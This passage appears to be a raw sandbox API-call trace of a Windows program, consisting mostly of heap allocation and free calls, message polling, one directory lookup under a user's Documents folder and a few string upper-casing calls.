[0266.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0266.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0266.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0266.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0266.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0266.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0266.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0266.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.625] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0266.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0266.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0266.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0266.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0266.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0266.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0266.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0266.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0266.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0266.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0266.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0266.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0266.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0266.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0266.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.629] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0266.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0266.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0266.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0266.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0266.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.631] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0266.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0266.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0266.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0266.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.632] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Zq0bBrnPbhA3GBBLi8", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x432bb3c0, ftCreationTime.dwHighDateTime=0x1d4c59a, ftLastAccessTime.dwLowDateTime=0x748bcd30, ftLastAccessTime.dwHighDateTime=0x1d4c705, ftLastWriteTime.dwLowDateTime=0x748bcd30, ftLastWriteTime.dwHighDateTime=0x1d4c705, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9fe0047, dwReserved1=0x2a1bc, cFileName="Zq0bBrnPbhA3GBBLi8", cAlternateFileName="ZQ0BBR~1")) returned 0xaa5860 [0266.633] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0266.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.634] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0266.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0266.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0266.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0266.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.636] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0266.637] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0266.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0266.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0266.637] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.638] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0266.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.638] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.639] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.639] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0266.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.639] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0266.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.640] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.641] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.641] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.643] PeekMessageW (in: 